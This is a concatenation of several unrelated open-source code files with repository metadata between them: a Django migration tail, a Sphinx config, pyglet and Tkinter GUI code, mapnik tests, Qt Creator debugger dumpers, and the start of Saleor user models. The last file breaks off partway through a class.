('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('meus_itens', models.TextField(null=True)),
('usuario', models.ForeignKey(to='loja.Usuario')),
],
),
migrations.AlterField(
model_name='produto',
name='imagem',
field=models.ImageField(upload_to='loja/static/product_images'),
),
migrations.AddField(
model_name='item',
name='id_produto',
field=models.ForeignKey(to='loja.Produto'),
),
]
| mit | -4,721,522,809,531,881,000 | 30.179487 | 114 | 0.536184 | false |
dhamaniasad/readitbetter | docs/conf.py | 1 | 8452 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# readitbetter documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import readitbetter
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'readitbetter'
copyright = u'2015, Asad Dhamani'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = readitbetter.__version__
# The full version, including alpha/beta/rc tags.
release = readitbetter.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'readitbetterdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'readitbetter.tex',
u'readitbetter Documentation',
u'Asad Dhamani', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'readitbetter',
u'readitbetter Documentation',
[u'Asad Dhamani'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'readitbetter',
u'readitbetter Documentation',
u'Asad Dhamani',
'readitbetter',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | -5,454,957,879,573,766,000 | 29.734545 | 76 | 0.706342 | false |
bitcraft/pyglet | contrib/scene2d/examples/los.py | 1 | 1819 | # Lots Of Sprites
"""
Results (us per sprite per frame):
sprites AMD64/mesa AMD64/nv6.6k MacBook Pro AMD/nv7.8k
2000 28.3 29.3 20.6 22.0
after __slots__ removal
sprites AMD64/mesa AMD64/nv6.6k MacBook Pro AMD/nv7.8k
2000
"""
import os
import sys
import random
from pyglet import options
options['debug_gl'] = False
from pyglet.window import Window
from pyglet import clock
from scene2d import *
from pyglet.gl import *
w = Window(600, 600, vsync=False)
img = Image2d.load('examples/noisy/ball.png')
class BouncySprite(Sprite):
dx = dy = 0
def update(self):
# move, check bounds
p = self.properties
self.x += self.dx
self.y += self.dy
if self.x < 0:
self.x = 0
self.dx = -self.dx
elif self.right > 600:
self.right = 600
self.dx = -self.dx
if self.y < 0:
self.y = 0
self.dy = -self.dy
elif self.top > 600:
self.top = 600
self.dy = -self.dy
sprites = list()
numsprites = int(sys.argv[1])
for i in range(numsprites):
x = random.randint(0, w.width - img.width)
y = random.randint(0, w.height - img.height)
s = BouncySprite(x, y, img.width, img.height, img)
s.dx = random.randint(-10, 10)
s.dy = random.randint(-10, 10)
sprites.append(s)
view = FlatView.from_window(w, sprites=sprites)
view.fx, view.fy = w.width / 2, w.height / 2
t = 0
numframes = 0
while 1:
if w.has_exit:
print('FPS:', clock.get_fps())
print('us per sprite:', float(t) / (numsprites * numframes) * 1000000)
break
t += clock.tick()
w.dispatch_events()
for s in sprites:
s.update()
view.clear()
view.draw()
w.flip()
numframes += 1
w.close()
| bsd-3-clause | -3,383,312,969,358,007,000 | 21.182927 | 78 | 0.575041 | false |
maltouzes/pixel-fighters-2D | change_background.py | 1 | 1084 | """ This file is a part of pixel-fighters-2D made by Maltouzes """
def change_background(self, keycode):
""" Change the background """
if keycode[1] == '&':
self.img_back.source = (self.path +
'/background/fight-backgrounds-16.gif')
self.default_y_character = 110
elif keycode[1] == '\xc3\xa9':
self.img_back.source = (self.path +
'/background/fight-backgrounds-07.gif')
self.default_y_character = 130
elif keycode[1] == '"':
self.img_back.source = (self.path +
'/background/fight-backgrounds-01.gif')
self.default_y_character = 40
elif keycode[1] == "'":
self.img_back.source = (self.path +
'/background/fight-backgrounds-04.gif')
self.default_y_character = 105
elif keycode[1] == '(':
self.img_back.source = (self.path +
'/background/fight-backgrounds-15.gif')
self.default_y_character = 135
self.restart_game()
| gpl-3.0 | 5,851,817,295,676,720,000 | 40.692308 | 71 | 0.52952 | false |
manz/python-mapnik | test/python_tests/copy_test.py | 1 | 2951 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, mapnik
from nose.tools import *
from .utilities import execution_path, run_all
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
def test_image_16_8_simple():
im = mapnik.Image(2,2,mapnik.ImageType.gray16)
im.set_pixel(0,0, 256)
im.set_pixel(0,1, 999)
im.set_pixel(1,0, 5)
im.set_pixel(1,1, 2)
im2 = im.copy(mapnik.ImageType.gray8)
eq_(im2.get_pixel(0,0), 255)
eq_(im2.get_pixel(0,1), 255)
eq_(im2.get_pixel(1,0), 5)
eq_(im2.get_pixel(1,1), 2)
# Cast back!
im = im2.copy(mapnik.ImageType.gray16)
eq_(im.get_pixel(0,0), 255)
eq_(im.get_pixel(0,1), 255)
eq_(im.get_pixel(1,0), 5)
eq_(im.get_pixel(1,1), 2)
def test_image_32f_8_simple():
im = mapnik.Image(2,2,mapnik.ImageType.gray32f)
im.set_pixel(0,0, 120.1234)
im.set_pixel(0,1, -23.4)
im.set_pixel(1,0, 120.6)
im.set_pixel(1,1, 360.2)
im2 = im.copy(mapnik.ImageType.gray8)
eq_(im2.get_pixel(0,0), 120)
eq_(im2.get_pixel(0,1), 0)
eq_(im2.get_pixel(1,0), 120) # Notice this is truncated!
eq_(im2.get_pixel(1,1), 255)
def test_image_offset_and_scale():
im = mapnik.Image(2,2,mapnik.ImageType.gray16)
eq_(im.offset, 0.0)
eq_(im.scaling, 1.0)
im.offset = 1.0
im.scaling = 2.0
eq_(im.offset, 1.0)
eq_(im.scaling, 2.0)
def test_image_16_8_scale_and_offset():
im = mapnik.Image(2,2,mapnik.ImageType.gray16)
im.set_pixel(0,0, 256)
im.set_pixel(0,1, 258)
im.set_pixel(1,0, 99999)
im.set_pixel(1,1, 615)
offset = 255
scaling = 3
im2 = im.copy(mapnik.ImageType.gray8, offset, scaling)
eq_(im2.get_pixel(0,0), 0)
eq_(im2.get_pixel(0,1), 1)
eq_(im2.get_pixel(1,0), 255)
eq_(im2.get_pixel(1,1), 120)
# pixels will be a little off due to offsets in reverting!
im3 = im2.copy(mapnik.ImageType.gray16)
eq_(im3.get_pixel(0,0), 255) # Rounding error with ints
eq_(im3.get_pixel(0,1), 258) # same
eq_(im3.get_pixel(1,0), 1020) # The other one was way out of range for our scale/offset
eq_(im3.get_pixel(1,1), 615) # same
def test_image_16_32f_scale_and_offset():
im = mapnik.Image(2,2,mapnik.ImageType.gray16)
im.set_pixel(0,0, 256)
im.set_pixel(0,1, 258)
im.set_pixel(1,0, 0)
im.set_pixel(1,1, 615)
offset = 255
scaling = 3.2
im2 = im.copy(mapnik.ImageType.gray32f, offset, scaling)
eq_(im2.get_pixel(0,0), 0.3125)
eq_(im2.get_pixel(0,1), 0.9375)
eq_(im2.get_pixel(1,0), -79.6875)
eq_(im2.get_pixel(1,1), 112.5)
im3 = im2.copy(mapnik.ImageType.gray16)
eq_(im3.get_pixel(0,0), 256)
eq_(im3.get_pixel(0,1), 258)
eq_(im3.get_pixel(1,0), 0)
eq_(im3.get_pixel(1,1), 615)
if __name__ == "__main__":
setup()
exit(run_all(eval(x) for x in dir() if x.startswith("test_")))
| lgpl-2.1 | 391,526,796,492,739,460 | 30.731183 | 91 | 0.606574 | false |
wdv4758h/ZipPy | mx.zippy/suite.py | 1 | 3597 | suite = {
"mxversion" : "2.8.0",
"name" : "zippy",
"libraries" : {
"JLINE09" : {
"path" : "lib/jline-0.9.95-SNAPSHOT.jar",
"urls" : [
"http://mirrors.ibiblio.org/maven2/jline/jline/0.9.94/jline-0.9.94.jar",
],
"sha1" : "99a18e9a44834afdebc467294e1138364c207402",
},
"JYTHON" : {
"path" : "lib/jython-standalone-2.7-b3.jar",
"urls" : [
"http://repo1.maven.org/maven2/org/python/jython-standalone/2.7-b3/jython-standalone-2.7-b3.jar",
],
"sha1" : "56411f652bcf4acce8e9fb3bc7d06b4a0e926aaf",
},
"JAMM" : {
"path" : "lib/jamm-0.2.5.jar",
"urls" : [
"http://central.maven.org/maven2/com/github/stephenc/jamm/0.2.5/jamm-0.2.5.jar",
],
"sha1" : "0422d3543c01df2f1d8bd1f3064adb54fb9e93f3",
},
},
"projects" : {
"edu.uci.python.nodes" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.runtime","com.oracle.truffle.api","com.oracle.truffle.api.dsl","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"annotationProcessors" : ["com.oracle.truffle.dsl.processor"],
"workingSets" : "Truffle,Python",
},
"edu.uci.python.parser" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.profiler","edu.uci.python.builtins","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.shell" : {
"sourceDirs" : ["src"],
"dependencies" : ["JLINE09","edu.uci.python.nodes","edu.uci.python.profiler","edu.uci.python.runtime","edu.uci.python.parser","edu.uci.python.builtins",
"JYTHON","JAVA_ALLOCATION_INSTRUMENTER"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.profiler" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.builtins" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.runtime","edu.uci.python.profiler","com.oracle.truffle.api","com.oracle.truffle.api.dsl","JYTHON"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"annotationProcessors" : ["com.oracle.truffle.dsl.processor"],
"workingSets" : "Truffle,Python",
},
"edu.uci.python.runtime" : {
"sourceDirs" : ["src"],
"dependencies" : ["com.oracle.truffle.api","JYTHON","ASM","JAMM"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.benchmark" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.runtime","JUNIT"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
"edu.uci.python.test" : {
"sourceDirs" : ["src"],
"dependencies" : ["edu.uci.python.nodes","edu.uci.python.runtime","edu.uci.python.shell","JUNIT"],
"checkstyle" : "edu.uci.python.runtime",
"javaCompliance" : "1.8",
"workingSets" : "Truffle,Python",
},
},
"distributions" : {
"ZIPPY" : {
"path" : "zippy.jar",
"dependencies" : [
"edu.uci.python.shell",
],
"sourcesPath" : "zippy-sources.jar",
},
},
}
| bsd-3-clause | -1,377,687,197,379,758,300 | 32 | 162 | 0.57409 | false |
SchwarzerWolf/KSFH | modules/base.py | 1 | 4197 | #!/usr/bin/env python
""" SchwarzerWolf.cc
**************************
*date = '2017-10-30' *
*module_version = '0.0.4'*
**************************
***********************************************************************
*[KSFH - Kraftsport und Fitness Helfer] *
*Module -> './modules/base.py' *
* *
*Copyleft [2017] - [SchwarzerWolf.cc] *
*This program is free software: you can redistribute it and/or modify *
*it under the terms of the GNU General Public License as published by *
*the Free Software Foundation, either version 3 of the License, or *
*(at your option) any later version. *
* *
*This program is distributed in the hope that it will be useful, *
*but WITHOUT ANY WARRANTY; without even the implied warranty of *
*MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
*GNU General Public License for more details. *
* *
*You should have received a copy of the GNU General Public License *
*along with this program. If not, see <http://www.gnu.org/licenses/>.*
***********************************************************************
"""
# Imports
# **********************************************************************
import tkinter as tk
from modules.version import program_title, program_date, program_version
# **********************************************************************
class Base(tk.Frame):
def __init__(self, nb):
tk.Frame.__init__(self, master=nb)
# Pics :-)
self.pic_swolf = tk.PhotoImage(
file='./propaganda/schwarzerwolf_header.png')
self.pic_deb = tk.PhotoImage(
file='./propaganda/debian_100.png')
self.pic_tux = tk.PhotoImage(
file='./propaganda/tux_153.png')
self.pic_python = tk.PhotoImage(
file='./propaganda/python-powered_130.png')
# Center text
self.grid_columnconfigure(0, weight=1)
self.configure(background='#000000')
# Modules
self.gui()
def gui(self):
""" Starts all gui methods.
:return:
"""
self.gui_main()
self.gui_propaganda()
def gui_main(self):
""" The main gui.
Contains everything that is not in a frame (except the frames
themselves).
:return:
"""
title = tk.Label(master=self,
text=program_title,
font=('Helvetica', 18),
bg='#000000',
fg='#ffffff',
pady=15)
proginfo = tk.Label(master=self,
font=('Helvetica', 11),
bg='#000000',
fg='#ffffff',
text='Version: {version}\n{date}'.format(
version=program_version,
date=program_date))
schwarzerwolf = tk.Label(master=self,
bg='#000000',
image=self.pic_swolf)
title.grid(row=0)
proginfo.grid(row=1)
schwarzerwolf.grid(row=2)
def gui_propaganda(self):
""" Displays the images. """
frame_one = tk.Frame(master=self,
bg='#000000')
debian = tk.Label(master=frame_one,
bg='#000000',
image=self.pic_deb)
tux = tk.Label(master=frame_one,
bg='#000000',
image=self.pic_tux)
python = tk.Label(master=frame_one,
bg='#000000',
image=self.pic_python)
# Grids
frame_one.grid(row=3)
debian.grid(row=4, sticky=tk.W)
tux.grid(row=4, padx=250)
python.grid(row=4, sticky=tk.E)
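# --- Editor's usage sketch (not part of the original module) ---
# Base() expects a notebook-like master ("nb"); embedding it in a ttk.Notebook is
# an assumption about how the application wires its tabs, and the image files
# under ./propaganda/ must exist for the frame to build.
if __name__ == '__main__':
    from tkinter import ttk
    root = tk.Tk()
    notebook = ttk.Notebook(master=root)
    notebook.pack(fill='both', expand=True)
    notebook.add(Base(notebook), text='Start')
    root.mainloop()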
| gpl-3.0 | -7,002,189,345,975,905,000 | 33.121951 | 72 | 0.432452 | false |
Philips14171/qt-creator-opensource-src-4.2.1 | share/qtcreator/debugger/creatortypes.py | 1 | 8306 | ############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
from dumper import *
def stripTypeName(value):
type = value.type
try:
type = type.target()
except:
pass
return str(type.unqualified())
def extractPointerType(d, value):
postfix = ""
while stripTypeName(value) == "CPlusPlus::PointerType":
postfix += "*"
value = d.downcast(value["_elementType"]["_type"])
try:
return readLiteral(d, value["_name"]) + postfix
except:
typeName = str(value.type.unqualified().target())
if typeName == "CPlusPlus::IntegerType":
return "int" + postfix
elif typeName == "CPlusPlus::VoidType":
return "void" + postfix
return "<unsupported>"
def readTemplateName(d, value):
name = readLiteral(d, value["_identifier"]) + "<"
args = value["_templateArguments"]
impl = args["_M_impl"]
start = impl["_M_start"]
size = impl["_M_finish"] - start
try:
d.check(0 <= size and size <= 100)
d.checkPointer(start)
for i in range(int(size)):
if i > 0:
name += ", "
name += extractPointerType(d, d.downcast(start[i]["_type"]))
except:
return "<not accessible>"
name += ">"
return name
def readLiteral(d, value):
if d.isNull(value):
return "<null>"
value = d.downcast(value)
type = value.type.unqualified()
try:
type = type.target()
except:
pass
typestr = str(type)
if typestr == "CPlusPlus::TemplateNameId":
return readTemplateName(d, value)
elif typestr == "CPlusPlus::QualifiedNameId":
return readLiteral(d, value["_base"]) + "::" + readLiteral(d, value["_name"])
try:
return d.extractBlob(value["_chars"], value["_size"]).toString()
except:
return "<unsupported>"
def dumpLiteral(d, value):
d.putValue(d.hexencode(readLiteral(d, value)), "latin1")
def qdump__Core__Id(d, value):
val = value.extractPointer()
try:
name = d.parseAndEvaluate("Core::nameForId(0x%x)" % val)
d.putSimpleCharArray(name.pointer())
except:
d.putValue(val)
d.putPlainChildren(value)
def qdump__Debugger__Internal__GdbMi(d, value):
val = d.encodeString(value["m_name"]) + "3a002000" \
+ d.encodeString(value["m_data"])
d.putValue(val, "utf16")
d.putPlainChildren(value)
def qdump__Debugger__Internal__DisassemblerLine(d, value):
d.putByteArrayValue(value["m_data"])
d.putPlainChildren(value)
def qdump__Debugger__Internal__WatchData(d, value):
d.putStringValue(value["iname"])
d.putPlainChildren(value)
def qdump__Debugger__Internal__WatchItem(d, value):
d.putStringValue(value["iname"])
d.putPlainChildren(value)
def qdump__Debugger__Internal__BreakpointModelId(d, value):
d.putValue("%s.%s" % (int(value["m_majorPart"]), int(value["m_minorPart"])))
d.putPlainChildren(value)
def qdump__Debugger__Internal__ThreadId(d, value):
d.putValue("%s" % value["m_id"])
d.putPlainChildren(value)
def qdump__CPlusPlus__ByteArrayRef(d, value):
d.putSimpleCharArray(value["m_start"], value["m_length"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Identifier(d, value):
d.putSimpleCharArray(value["_chars"], value["_size"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Symbol(d, value):
dumpLiteral(d, value["_name"])
d.putBetterType(value.type)
d.putPlainChildren(value)
def qdump__CPlusPlus__Class(d, value):
qdump__CPlusPlus__Symbol(d, value)
def qdump__CPlusPlus__IntegerType(d, value):
d.putValue(value["_kind"])
d.putPlainChildren(value)
def qdump__CPlusPlus__FullySpecifiedType(d, value):
type = d.downcast(value["_type"])
typeName = stripTypeName(type)
if typeName == "CPlusPlus::NamedType":
dumpLiteral(d, type["_name"])
elif typeName == "CPlusPlus::PointerType":
d.putValue(d.hexencode(extractPointerType(d, type)), "latin1")
d.putPlainChildren(value)
def qdump__CPlusPlus__NamedType(d, value):
dumpLiteral(d, value["_name"])
d.putBetterType(value.type)
d.putPlainChildren(value)
def qdump__CPlusPlus__PointerType(d, value):
d.putValue(d.hexencode(extractPointerType(d, value)), "latin1")
d.putPlainChildren(value)
def qdump__CPlusPlus__TemplateNameId(d, value):
dumpLiteral(d, value)
d.putBetterType(value.type)
d.putPlainChildren(value)
def qdump__CPlusPlus__QualifiedNameId(d, value):
dumpLiteral(d, value)
d.putPlainChildren(value)
def qdump__CPlusPlus__Literal(d, value):
dumpLiteral(d, value)
d.putPlainChildren(value)
def qdump__CPlusPlus__StringLiteral(d, value):
d.putSimpleCharArray(value["_chars"], value["_size"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Internal__Value(d, value):
d.putValue(value["l"])
d.putPlainChildren(value)
def qdump__Utils__FileName(d, value):
d.putStringValue(value)
d.putPlainChildren(value)
def qdump__Utils__ElfSection(d, value):
d.putByteArrayValue(value["name"])
d.putPlainChildren(value)
def qdump__CPlusPlus__Token(d, value):
k = value["f"]["kind"]
e = int(k)
type = str(k.cast(d.lookupType("CPlusPlus::Kind")))[11:] # Strip "CPlusPlus::"
try:
if e == 6:
type = readLiteral(d, value["identifier"]) + " (%s)" % type
elif e >= 7 and e <= 23:
type = readLiteral(d, value["literal"]) + " (%s)" % type
except:
pass
d.putValue(type)
d.putPlainChildren(value)
def qdump__CPlusPlus__Internal__PPToken(d, value):
data, size, alloc = d.byteArrayData(value["m_src"])
length = int(value["f"]["utf16chars"])
offset = int(value["utf16charOffset"])
#warn("size: %s, alloc: %s, offset: %s, length: %s, data: %s"
# % (size, alloc, offset, length, data))
d.putValue(d.readMemory(data + offset, min(100, length)), "latin1")
d.putPlainChildren(value)
def qdump__ProString(d, value):
try:
s = value["m_string"]
data, size, alloc = d.stringData(s)
data += 2 * int(value["m_offset"])
size = int(value["m_length"])
s = d.readMemory(data, 2 * size)
d.putValue(s, "utf16")
except:
d.putEmptyValue()
d.putPlainChildren(value)
def qdump__ProKey(d, value):
qdump__ProString(d, value)
d.putBetterType(value.type)
def qdump__Core__GeneratedFile(d, value):
d.putStringValue(value["m_d"]["d"]["path"])
d.putPlainChildren(value)
def qdump__ProjectExplorer__Node(d, value):
d.putStringValue(value["m_filePath"])
d.putPlainChildren(value)
def qdump__ProjectExplorer__FolderNode(d, value):
d.putStringValue(value["m_displayName"])
d.putPlainChildren(value)
def qdump__ProjectExplorer__ProjectNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
def qdump__CMakeProjectManager__Internal__CMakeProjectNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
def qdump__QmakeProjectManager__QmakePriFileNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
def qdump__QmakeProjectManager__QmakeProFileNode(d, value):
qdump__ProjectExplorer__FolderNode(d, value)
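# --- Editor's note (illustration only) ---
# The debugging helpers discover dumpers by name, mapping "qdump__A__B" to the
# C++ type "A::B".  The type and its "m_id" member below are made up to show the
# minimal shape of a new dumper; they are not part of Qt Creator.
def qdump__MyNamespace__MyType(d, value):
    d.putValue(value["m_id"])
    d.putPlainChildren(value)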
| gpl-3.0 | -1,459,053,719,158,352,600 | 31.700787 | 85 | 0.646641 | false |
hongquan/saleor | saleor/userprofile/models.py | 1 | 6670 | from __future__ import unicode_literals
import re
from django.contrib.auth.hashers import (check_password, make_password,
is_password_usable)
from django.contrib.auth.models import BaseUserManager, PermissionsMixin
from django.db import models
from django.forms.models import model_to_dict
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
from django.utils.safestring import mark_safe
from django.utils.translation import pgettext_lazy
from unidecode import unidecode
from ..core.countries import COUNTRY_CHOICES
class AddressManager(models.Manager):
def as_data(self, address):
return model_to_dict(address, exclude=['id', 'user'])
def are_identical(self, addr1, addr2):
data1 = self.as_data(addr1)
data2 = self.as_data(addr2)
return data1 == data2
def store_address(self, user, address):
data = self.as_data(address)
address, created = user.addresses.get_or_create(**data)
return address
@python_2_unicode_compatible
class Address(models.Model):
first_name = models.CharField(
pgettext_lazy('Address field', 'first name'),
max_length=256)
last_name = models.CharField(
pgettext_lazy('Address field', 'last name'),
max_length=256)
company_name = models.CharField(
pgettext_lazy('Address field', 'company name'),
max_length=256, blank=True)
street_address_1 = models.CharField(
pgettext_lazy('Address field', 'street address 1'),
max_length=256)
street_address_2 = models.CharField(
pgettext_lazy('Address field', 'street address 2'),
max_length=256, blank=True)
city = models.CharField(
pgettext_lazy('Address field', 'city'),
max_length=256)
postal_code = models.CharField(
pgettext_lazy('Address field', 'postal code'),
max_length=20)
country = models.CharField(
pgettext_lazy('Address field', 'country'),
choices=COUNTRY_CHOICES, max_length=2)
country_area = models.CharField(
pgettext_lazy('Address field', 'country administrative area'),
max_length=128, blank=True)
phone = models.CharField(
pgettext_lazy('Address field', 'phone number'),
max_length=30, blank=True)
objects = AddressManager()
def __str__(self):
return '%s %s' % (self.first_name, self.last_name)
def __repr__(self):
return (
'Address(first_name=%r, last_name=%r, company_name=%r, '
'street_address_1=%r, street_address_2=%r, city=%r, '
'postal_code=%r, country=%r, country_area=%r, phone=%r)' % (
self.first_name, self.last_name, self.company_name,
self.street_address_1, self.street_address_2, self.city,
self.postal_code, self.country, self.country_area,
self.phone))
class UserManager(BaseUserManager):
def get_or_create(self, **kwargs):
defaults = kwargs.pop('defaults', {})
try:
return self.get_query_set().get(**kwargs), False
except self.model.DoesNotExist:
defaults.update(kwargs)
return self.create_user(**defaults), True
def create_user(self, email, password=None, is_staff=False,
is_active=True, **extra_fields):
'Creates a User with the given username, email and password'
email = UserManager.normalize_email(email)
user = self.model(email=email, is_active=is_active,
is_staff=is_staff, **extra_fields)
if password:
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password=None, **extra_fields):
return self.create_user(email, password, is_staff=True,
is_superuser=True, **extra_fields)
def store_address(self, user, address, billing=False, shipping=False):
entry = Address.objects.store_address(user, address)
changed = False
if billing and not user.default_billing_address_id:
user.default_billing_address = entry
changed = True
if shipping and not user.default_shipping_address_id:
user.default_shipping_address = entry
changed = True
if changed:
user.save()
@python_2_unicode_compatible
class User(PermissionsMixin, models.Model):
email = models.EmailField(unique=True)
addresses = models.ManyToManyField(Address)
is_staff = models.BooleanField(
pgettext_lazy('User field', 'staff status'),
default=False)
is_active = models.BooleanField(
pgettext_lazy('User field', 'active'),
default=False)
password = models.CharField(
pgettext_lazy('User field', 'password'),
max_length=128, editable=False)
date_joined = models.DateTimeField(
pgettext_lazy('User field', 'date joined'),
default=timezone.now, editable=False)
last_login = models.DateTimeField(
pgettext_lazy('User field', 'last login'),
default=timezone.now, editable=False)
